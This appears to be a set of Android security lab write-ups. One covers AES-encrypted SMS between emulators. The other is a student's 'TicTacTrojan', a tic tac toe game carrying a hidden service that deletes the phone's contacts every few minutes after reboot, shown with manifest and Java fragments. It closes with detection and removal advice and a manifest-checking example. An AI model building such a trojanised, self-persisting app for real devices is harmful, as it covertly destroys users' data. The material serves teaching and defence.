Open two emulators in Eclipse and run the Android project "EncDecSMS" on both. Emulator 1 serves as the sender, which sends an encrypted short message to Emulator 2. Emulator 2 serves as the receiver, which receives the short message from Emulator 1 and decrypts the received ciphertext. Upon starting the activity, since we will use Emulator 1 to send the short message, we should press the "Cancel" button on Emulator 2 so that Emulator 2 can receive the message. On Emulator 1 we fill in the corresponding information: the recipient, the 16-character AES secret key and the message body. One thing to note here: the AES secret key must be a 16-character input. This is because the AES encryption algorithm we use is a 128-bit block cipher which must use a 128-bit, a 192-bit or a 256-bit secret key. Here we set it to accept only a 16-character (128-bit) secret key for simplicity, and we use "1111111111111111" as the secret key for demonstration.
After filling in this information, the user can press the "Send" button and the message is sent to Emulator 2. Upon receiving it, Emulator 2 looks as follows:
On Emulator 2 we can see that the sender's phone number and the received encrypted message have been filled into the text fields. The user should then enter the secret key in the input box so that it can be used to decrypt the message. The secret key must be the same as the one used to encrypt the message, here "1111111111111111". After filling in the correct secret key in the box, press the "Submit" button and the decrypted message should appear.
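The 16-character key rule described above, as an added example that is not the EncDecSMS app's own code: plain-JVM Java that turns a typed 16-character key into an AES-128 key, round-trips a message and rejects a wrong key. The page does not say which cipher mode the app uses; AES-GCM, the Base64 encoding of the SMS body and all class and method names here are assumptions. A key typed as 16 characters carries far less entropy than a random 128-bit key.

```java
import javax.crypto.Cipher;
import javax.crypto.spec.GCMParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import java.nio.charset.StandardCharsets;
import java.security.SecureRandom;
import java.util.Arrays;
import java.util.Base64;

public class SmsAesDemo {  // hypothetical class name, not from the app
    // Turn the typed key into an AES-128 key; reject anything that is not exactly 16 bytes.
    static SecretKeySpec keyFrom(String typed) {
        byte[] k = typed.getBytes(StandardCharsets.UTF_8);
        if (k.length != 16)
            throw new IllegalArgumentException("key must encode to 16 bytes, got " + k.length);
        return new SecretKeySpec(k, "AES");
    }

    // Encrypt and return Base64(iv || ciphertext || tag) so the result fits in a text SMS body.
    static String encrypt(String typedKey, String message) throws Exception {
        byte[] iv = new byte[12];
        new SecureRandom().nextBytes(iv);  // fresh IV for every message
        Cipher c = Cipher.getInstance("AES/GCM/NoPadding");
        c.init(Cipher.ENCRYPT_MODE, keyFrom(typedKey), new GCMParameterSpec(128, iv));
        byte[] ct = c.doFinal(message.getBytes(StandardCharsets.UTF_8));
        byte[] out = Arrays.copyOf(iv, iv.length + ct.length);
        System.arraycopy(ct, 0, out, iv.length, ct.length);
        return Base64.getEncoder().encodeToString(out);
    }

    // Split off the 12-byte IV, then decrypt and verify the authentication tag.
    static String decrypt(String typedKey, String smsBody) throws Exception {
        byte[] in = Base64.getDecoder().decode(smsBody);
        Cipher c = Cipher.getInstance("AES/GCM/NoPadding");
        c.init(Cipher.DECRYPT_MODE, keyFrom(typedKey), new GCMParameterSpec(128, in, 0, 12));
        return new String(c.doFinal(in, 12, in.length - 12), StandardCharsets.UTF_8);
    }

    public static void main(String[] args) throws Exception {
        // Demonstration key from the page; the message text is constructed.
        String body = encrypt("1111111111111111", "hello from Emulator 1");
        System.out.println("SMS body:  " + body);
        System.out.println("right key: " + decrypt("1111111111111111", body));
        try {
            decrypt("2222222222222222", body);
        } catch (javax.crypto.AEADBadTagException e) {
            System.out.println("wrong key: rejected (authentication tag mismatch)");
        }
    }
}
```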
By Sam Rothermel
He chose a tic tac toe game, and has it delete the user's contact list as the attack. Instead of going through and deleting just once, the Trojan runs a background service on the phone and deletes periodically, every few minutes. Furthermore, to obscure the link between the app and the Trojan, he set it up to run only after the next boot. First, a simple tic tac toe program was obtained from open source here: http://www.edumobile.org/android/android-development/tictactoe-game-implementation/ Credit goes to Sushant for the code. While he borrowed the code for the tic tac toe app, the code for the Trojan is his own work. These permissions are added in the Manifest.xml file:
<uses-permission android:name="android.permission.READ_CONTACTS" />
<uses-permission android:name="android.permission.WRITE_CONTACTS" />
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
The READ/WRITE_CONTACTS are for accessing and changing the contact info on the phone; the RECEIVE_BOOT_COMPLETED is for when the phone starts up, which is when the attack began.
Also, a BOOT_COMPLETED intent-filter was needed to fire when the device first starts up and call the receiver that sets up the attack. Another receiver is then registered for running the service periodically (so it never quits), along with the service that performs the attack.
<receiver android:name=".StartAttack" >
<action android:name="android.intent.action.BOOT_COMPLETED" />
Next, set up classes. In StartAttack.java, which is the class called when the next boot happens so long as the app is installed, the first critical lines are given below:
AlarmManager service = (AlarmManager)context.getSystemService(Context.ALARM_SERVICE);
Intent i = new Intent(context, RunTrojan.class);
PendingIntent pending = PendingIntent.getBroadcast(context, 0, i, PendingIntent.FLAG_CANCEL_CURRENT);
service.setInexactRepeating(AlarmManager.RTC_WAKEUP, cal.getTimeInMillis(), TIME, pending);
AlarmManager sets up the alarm service, which periodically “wakes up” the phone when it needs to do something after it has gone into sleep mode. The PendingIntent is the intent that goes off when the alarm fires, in order to call a broadcast receiver. Finally, .setInexactRepeating fires the intent periodically until the AlarmManager service is killed.
Next the RunTrojan class captures the repeating intent to fire our Trojan class. Inside the Trojan class, we run this code:
Uri uri = Uri.withAppendedPath(ContactsContract.Contacts.CONTENT_LOOKUP_URI, lookupKey);
contentResolver.delete(uri, null, null);
}
This gets our phone’s contacts, goes through all of them, and deletes them in one simple while loop. This is where the attack happens. Now on to the demo:
First shot is of the phone’s contacts properly in place. Second is of the tic tac toe app being run for the first time. User is unaware of any connection between these programs.
After restarting the phone, the contacts are still there if you go to them immediately, but the service always waits a couple of minutes before it strikes. The left image is from a few minutes after restarting the phone: the user did not delete the contacts, they just disappeared. In fact, if you’re watching the contacts page on the phone, they will all vanish instantly. Now, to make sure the attack keeps happening, a couple of contacts are set up again in the right picture. Sure enough, after a few more minutes they disappear again!
Malware Defence:
Now we come to how we can identify and remove it. Deleting the app is enough to get rid of the Trojan; alternatively, we can stop the service, so long as we identify it as the culprit. Using LBE Privacy Guard, we can see that TicTacTrojan is accessing our Contacts, something you wouldn’t normally expect a game to do. Using the active protection feature, we can prompt the user whenever the app tries to access our contacts, thereby revealing what it’s attempting to do and possibly saving the contact list from harm. We can also see the app is being run as a service even though we never started it after boot, making it appear very suspicious even without any sort of protective software. There are also programs, such as BackupContacts, found here: https://play.google.com/store/apps/details?id=no.uia.android.backupcontacts&hl=en that can back up our contact lists in case they ever become compromised. Mobile Backup II was another one we covered in the labs that could be used for contacts.
First picture shows that TicTacTrojan is possibly accessing contacts in a malicious manner. Second picture shows the app is running after phone reboot even though I never started it. Note that it starts later because of the buffer time in AlarmManager set up.
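One way to automate the permission check described above (an added example, not code from the original write-up): it flags a manifest that combines contact write access with a boot-time receiver, the pairing that makes a game look suspicious here. It assumes the manifest has already been decoded to text XML; the sample manifest, its package name and the class and method names are constructed for illustration.

```java
import org.w3c.dom.*;
import javax.xml.parsers.DocumentBuilderFactory;
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;

public class ManifestTriage {  // hypothetical class name
    static final String ANDROID_NS = "http://schemas.android.com/apk/res/android";

    // Collect the android:name attribute of every element with the given tag.
    static List<String> names(Document d, String tag) {
        List<String> out = new ArrayList<>();
        NodeList n = d.getElementsByTagName(tag);
        for (int i = 0; i < n.getLength(); i++)
            out.add(((Element) n.item(i)).getAttributeNS(ANDROID_NS, "name"));
        return out;
    }

    // Return human-readable findings for a decoded AndroidManifest.xml.
    static List<String> findings(String manifestXml) throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setNamespaceAware(true);
        // Untrusted input: refuse DOCTYPE declarations so the parser cannot be abused (XXE).
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        Document d = f.newDocumentBuilder()
                .parse(new ByteArrayInputStream(manifestXml.getBytes(StandardCharsets.UTF_8)));
        List<String> perms = names(d, "uses-permission");
        boolean write = perms.contains("android.permission.WRITE_CONTACTS");
        boolean boot = perms.contains("android.permission.RECEIVE_BOOT_COMPLETED")
                && names(d, "action").contains("android.intent.action.BOOT_COMPLETED");
        List<String> out = new ArrayList<>();
        if (write) out.add("can modify or delete contacts");
        if (boot) out.add("runs code at boot without the user opening the app");
        if (write && boot) out.add("HIGH: boot-time start combined with contact write access");
        return out;
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample manifest, modelled on the entries shown on this page.
        String manifest =
              "<manifest xmlns:android='" + ANDROID_NS + "' package='com.example.tictactoe'>"
            + "<uses-permission android:name='android.permission.READ_CONTACTS'/>"
            + "<uses-permission android:name='android.permission.WRITE_CONTACTS'/>"
            + "<uses-permission android:name='android.permission.RECEIVE_BOOT_COMPLETED'/>"
            + "<application><receiver android:name='.StartAttack'><intent-filter>"
            + "<action android:name='android.intent.action.BOOT_COMPLETED'/>"
            + "</intent-filter></receiver></application></manifest>";
        for (String s : findings(manifest)) System.out.println(s);
    }
}
```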